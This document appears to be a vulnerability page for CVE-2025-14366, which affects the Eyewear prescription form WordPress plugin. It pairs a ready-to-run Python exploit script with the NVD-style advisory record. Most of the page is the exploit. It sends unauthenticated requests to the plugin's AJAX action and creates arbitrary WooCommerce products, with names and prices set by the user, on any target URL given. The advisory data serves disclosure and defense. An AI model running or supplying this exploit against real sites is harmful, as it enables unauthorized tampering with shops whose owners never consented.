CVE-2025-14366

import requests import sys # CVE-2025-14366 PoC - Unauthenticated WooCommerce Product Creation # Target: WordPress site with Eyewear prescription form plugin <= 6.0.1 def exploit(target_url, product_name="Malicious Product", price="99.99", parent_id="1"): """ Exploit the missing authorization vulnerability in Eyewear plugin Allows unauthenticated attackers to create WooCommerce products Args: target_url: Base URL of the WordPress site product_name: Name of the product to create price: Price of the product parent_id: Parent category/product ID """ # AJAX endpoint for the vulnerable action ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload for SubmitCatProductRequest AJAX action data = { "action": "SubmitCatProductRequest", "Name": product_name, "Price": price, "Parent": parent_id } print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-14366...") print(f"[*] Creating product: {product_name} with price: {price}") try: # Send request without authentication response = requests.post(ajax_url, data=data, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Response: {response.text[:200]}") # Check if product was created if "success" in response.text.lower() or "1" in response.text: print(f"[!] Product may have been created - verify in WooCommerce admin") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-14366.py <target_url>") print("Example: python cve-2025-14366.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit(target)

{"cve": {"id": "CVE-2025-14366", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:48.633", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Eyewear prescription form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.0.1. This is due to missing authorization checks on the SubmitCatProductRequest AJAX action. This makes it possible for unauthenticated attackers to create arbitrary WooCommerce products with custom names, prices, and category assignments via the 'Name', 'Price', and 'Parent' parameters."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L369", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L71", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f21d7a2-3b4f-487f-a64a-b963427233b3?source=cve", "source": "[email protected]"}]}}